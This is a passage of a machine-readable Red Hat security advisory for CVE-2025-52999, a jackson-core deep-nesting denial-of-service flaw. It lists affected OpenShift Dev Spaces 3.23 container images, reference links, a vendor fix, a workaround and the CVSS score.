          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-52999"
        },
        {
          "category": "external",
          "summary": "RHBZ#2374804",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2374804"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-52999",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-52999"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-52999",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52999"
        },
        {
          "category": "external",
          "summary": "https://github.com/FasterXML/jackson-core/pull/943",
          "url": "https://github.com/FasterXML/jackson-core/pull/943"
        },
        {
          "category": "external",
          "summary": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-h46c-h94j-95f3",
          "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-h46c-h94j-95f3"
        }
      ],
      "release_date": "2025-06-25T17:02:57.428000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        },
        {
          "category": "workaround",
          "details": "To mitigate this vulnerability, the recommendation is to avoid parsing input files from untrusted sources that may have excessively deep nested data structures; anything with a depth over 1000.",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
